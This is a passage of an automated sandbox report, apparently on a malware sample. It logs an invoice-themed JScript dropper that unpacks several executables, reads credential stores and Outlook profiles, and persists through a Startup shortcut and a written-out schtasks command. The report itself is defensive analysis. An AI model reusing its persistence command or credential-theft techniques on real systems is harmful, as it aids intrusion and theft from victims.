                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: mscoree.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: cryptsp.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: rsaenh.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: wbemcomn.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: amsi.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: rasapi32.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: rasman.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: rtutils.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: mswsock.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: winhttp.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: dnsapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: winnsi.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: rasadhlp.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: fwpuclnt.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: secur32.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: schannel.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: mskeyprotect.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: ntasn1.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: ncrypt.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: ncryptsslp.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: msasn1.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: gpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: vaultcli.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: dpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: edputil.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: windowscodecs.dll
                                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: mscoree.dll
                                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: cryptsp.dll
                                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: rsaenh.dll
                                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: dwrite.dll
                                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: msvcp140_clr0400.dll
                                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: mswsock.dll
                                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: secur32.dll
                                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: wbemcomn.dll
                                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: amsi.dll
                                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: windowscodecs.dll
                                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: dpapi.dll
                                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: rstrtmgr.dll
                                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: ncrypt.dll
                                Source: C:\Users\user\AppData\Local\Temp\build.exeSection loaded: ntasn1.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: mscoree.dll
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: cryptsp.dll
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: rsaenh.dll
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: edputil.dll
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                                Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: mscoree.dll
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: comsvcs.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: mscoree.dll
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
                                Source: TrojanAIbot.exe.lnk.17.drLNK file: ..\..\..\..\..\ACCApi\TrojanAIbot.exe
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                                Source: RFQ -PO.20571-0001-QBMS-PRQ-0200140.jsStatic file information: File size 4877072 > 1048576
                                Source: Binary string: wntdll.pdbUGP source: x.exe, 00000002.00000003.1530923482.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.1530355162.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1565181805.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1565707457.0000000005050000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.1600560631.0000000003F70000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.1600415328.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000009.00000003.1640373275.0000000004030000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000009.00000003.1640053185.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 0000000D.00000003.1680596257.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, x.exe, 0000000D.00000003.1679446140.00000000039A0000.00000004.00001000.00020000.00000000.sdmp
                                Source: Binary string: wntdll.pdb source: x.exe, 00000002.00000003.1530923482.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.1530355162.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1565181805.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1565707457.0000000005050000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.1600560631.0000000003F70000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000006.00000003.1600415328.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000009.00000003.1640373275.0000000004030000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000009.00000003.1640053185.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 0000000D.00000003.1680596257.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, x.exe, 0000000D.00000003.1679446140.00000000039A0000.00000004.00001000.00020000.00000000.sdmp
                                Source: server_BTC.exe.16.drStatic PE information: 0xAA16B5AE [Fri Jun 4 22:50:22 2060 UTC]
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0040EBD0 LoadLibraryA,GetProcAddress,2_2_0040EBD0
                                Source: RFQ -PO.20571-0001-QBMS-PRQ-0200140.jsString : entropy: 5.97, length: 4876722, content: "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4fug4AtAnNIbgGo to definition
                                Source: server_BTC.exe.16.drStatic PE information: real checksum: 0x0 should be: 0x42478
                                Source: x.exe.1.drStatic PE information: real checksum: 0xa961f should be: 0x388577
                                Source: neworigin.exe.16.drStatic PE information: real checksum: 0x0 should be: 0x480db
                                Source: build.exe.16.drStatic PE information: real checksum: 0x0 should be: 0x575be
                                Source: TrojanAIbot.exe.17.drStatic PE information: real checksum: 0x0 should be: 0x42478
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_00416CB5 push ecx; ret 2_2_00416CC8
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00416CB5 push ecx; ret 4_2_00416CC8
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00402A57 push esp; retf 16_2_00402A58
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_0040513D push 5DBA3BDAh; iretd 16_2_00405151
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F74B64 push 00F74E86h; ret 16_2_00F74C24
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F74B64 push 00F74E27h; ret 16_2_00F74EC9
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F97DF0 push 00F97D4Bh; ret 16_2_00F97D80
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F97DF0 push 00F97DD7h; ret 16_2_00F97D9F
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F97DF0 push 00F97D5Fh; ret 16_2_00F97DB3
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F97DF0 push 00F981E6h; ret 16_2_00F97E2D
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F97DF0 push 00F97FCCh; ret 16_2_00F982BB
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F97DF0 push 00F98468h; ret 16_2_00F9852D
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F98550 push 00F9852Eh; ret 16_2_00F97F3A
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F98550 push 00F98514h; ret 16_2_00F97F66
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F98550 push 00F97E66h; ret 16_2_00F98057
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F98550 push 00F9817Ah; ret 16_2_00F9808B
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F98550 push 00F982E5h; ret 16_2_00F980D9
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F98550 push 00F9826Ah; ret 16_2_00F9819E
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F98550 push 00F9849Ch; ret 16_2_00F981E4
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F98550 push 00F98321h; ret 16_2_00F982E0
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F98550 push 00F97FBFh; ret 16_2_00F9831F
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F98550 push 00F97FA8h; ret 16_2_00F9834C
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F98550 push 00F984BAh; ret 16_2_00F983E2
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F98550 push 00F98426h; ret 16_2_00F984D8
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F98550 push 00F98075h; ret 16_2_00F984FD
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F98550 push 00F9808Ch; ret 16_2_00F98512
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F98550 push 00F98D45h; ret 16_2_00F987D3
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F98550 push 00F98AB5h; ret 16_2_00F98B13
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F98550 push 00F98784h; ret 16_2_00F98CA1
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F98550 push 00F98DC9h; ret 16_2_00F98E1C
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F98550 push 00F98D14h; ret 16_2_00F98E2E
                                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\server_BTC.exeJump to dropped file
                                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\neworigin.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeFile created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\build.exeJump to dropped file

                                Boot Survival

                                barindex
                                Uses schtasks.exe or at.exe to add and modify task schedules
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 03:26 /du 23:59 /sc daily /ri 1 /f
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnkJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnkJump to behavior
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F9CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,16_2_00F9CBD0

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Loading BitLocker PowerShell Module
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_0047A330
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00434418
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,4_2_0047A330
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,4_2_00434418
                                Source: C:\Users\user\AppData\Local\Temp\neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
